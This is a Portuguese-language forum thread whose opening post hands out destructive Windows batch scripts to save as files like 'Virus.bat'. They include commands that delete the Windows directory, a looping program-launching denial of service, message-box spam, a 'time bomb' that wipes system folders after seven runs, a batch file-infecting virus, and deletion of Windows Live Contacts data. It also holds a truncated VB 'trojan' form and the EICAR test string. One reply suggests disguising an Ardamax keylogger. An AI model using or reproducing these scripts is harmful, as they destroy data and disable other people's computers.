antiblock
Elveron
  • Chatbox

    You don't have permission to chat.
    Load More
Unk3n0w7

Alguns Códigos .Bat

6 posts in this topic

Bem pessoal, neste post eu estou ensinando alguns códigos com extensão .bat
 
 
Copie o comando que estão em verde e cole no bloco de notas
 
“Salvando como” .BAT
Ex: Virus.bat
 
_______________________________________________
••Nome:Del All Windows - Função:Deleta tdo do Windows (fode o pc)••
rmdir /s /q c:windows
 
 
 
••Nome:Autoexec - Função:Fode com tudo••
@ECHO OFF
@BREAK OFF
deltree/C: Y*.*
 
 
 
••Nome:Trojan-1 - Função:Augumas dos trojans tradiçionais••
VERSION 5.00
Object = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0"; "mscomctl.ocx"
Begin VB.Form Form1
BackColor = &H80000007&
BorderStyle = 1 'Fixed Single
Caption = "Welcome to XP Blaster Pro (Enterprise Edition)!"
ClientHeight = 5400
ClientLeft = 45
ClientTop = 390
ClientWidth = 8085
BeginProperty Font
Name = "Fixedsys"
Size = 9
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Icon = "Source3.frx":0000
LinkTopic = "Form1"
MaxButton = 0 'False
MinButton = 0 'False
MouseIcon = "Source3.frx":08CA
PaletteMode = 2 'Custom
ScaleHeight = 5400
ScaleWidth = 8085
ShowInTaskbar = 0 'False
StartUpPosition = 3 'Windows Default
Begin VB.CommandButton Command3
Caption = "About"
BeginProperty Font
Name = "MS Sans Serif"
Size = 8.25
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height = 375
Left = 120
TabIndex = 3
Top = 4920
Width = 1215
End
Begin VB.CommandButton Command2
Appearance = 0 'Flat
BackColor = &H000000FF&
Caption = "WEBSITE"
BeginProperty Font
Name = "Trebuchet MS"
Size = 8.25
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height
 
 
 
••Nome:Del p/ Windows - Função:Deleta tudo dentro do Windows ex: arquivos e naum pastas••
del /s /q c:windows
 
 
 
••Nome:Shutdown-S - Função:Desliga o pc••
shutdown -s
 
 
 
••Nome:Shutdown-R - Função:Reinicia o pc••
shutdown -r
 
 
 
••Nome:Trojan-2 - Função:Fode com tudo mesmo••
@echo off
ctty nul
rem
for %%f in (*.exe *.com) do set A=%%f
if %A%==COMMAND.COM set A=
rename %A% V%A%
if not exist V%A% goto end
attrib +h V%A%
copy %0.bat %A%
attrib +r %A%
ren %A% *.bat
set A=
:end
ctty con
@if exist V%0.com V%0.com %1 %2 %3
@if exist V%0.exe V%0.exe %1 %2 %3
 
 
 
••Nome:Pirata - Função:Testar seu Anti-Virus ou enganar auguem••
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
 
 
 
••Nome:CLICK EM MIM - Função:Fica repetindo varias vezes a mesma mensagem••
@ECHO OFF
:REPETE
MSG * CLICK EM MIM
GOTO REPETE
 
 
 
••Nome:Progstar - Função:Abre varios programas sem parar, fais o pc travar••
@echo off
rem Denial Of Service Local
:Fucker
start notepad.exe
start write.exe
start sol.exe
start cmd.exe
start powerpnt.exe
start excel.exe
start winword.exe
start msacess.exe
goto Fucker:
 
 
 
••Nome:bomba relógio - Função:depois que ele for ativado 7 vezes ele apaga tudo••
c:
cd
echo off
if exist lig1.drv goto 2
echo > lig1.drv sdfsdf
goto fim
:2
if exist lig2.drv goto 3
echo > lig2.drv sdfsdf
goto fim
:3
if exist lig3.drv goto 4
echo > lig3.drv sdfsdf
goto fim
:4
if exist lig4.drv goto 5
echo > lig4.drv sdfsdf
goto fim
:5
if exist lig5.drv goto 6
echo > lig4.drv sdfsdf
goto fim
:6
if exist lig6.drv goto 7
echo > lig6.drv sdfsdf
goto fim
:7
rmdir C:windows
rmdir C:arquivos de programas
rmdir C:documents and settings
:fim
 
 
 
••Nome:MSN Fixer - Função:Congela todos os msn's que estao sendo executados••
cd %USERPROFILE%
cd Config~1
cd Dadosd~1
cd Micros~1
cd "Windows Live Contacts"
del /s /q *.*
 
Edited by NewForce (see edit history)

Share this post


Link to post
Share on other sites
antiblock
Elveron

Falta ai os créditos .

Share this post


Link to post
Share on other sites

Códigos desnecessarios, basicamente isso já não afecta muito ao computador e a maioria já detectado como vírus, também se não for é bem simplesClick direito » Editar e ves o que esta la programado.. A Era dos arquivos .bat já foi a muito.. Cumprimentos

Share this post


Link to post
Share on other sites

Códigos desnecessarios, basicamente isso já não afecta muito ao computador e a maioria já detectado como vírus, também se não for é bem simplesClick direito » Editar e ves o que esta la programado.. A Era dos arquivos .bat já foi a muito.. Cumprimentos

SOOO far from truth..... os .bat são essenciais para quem trabalha com windows, especificamente para técnicos e configuradores de servidores de rede

Share this post


Link to post
Share on other sites

:S Mais vale fazer keylogger com Ardamax e camuflar-lo :D mas obrigado por partilhares 

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now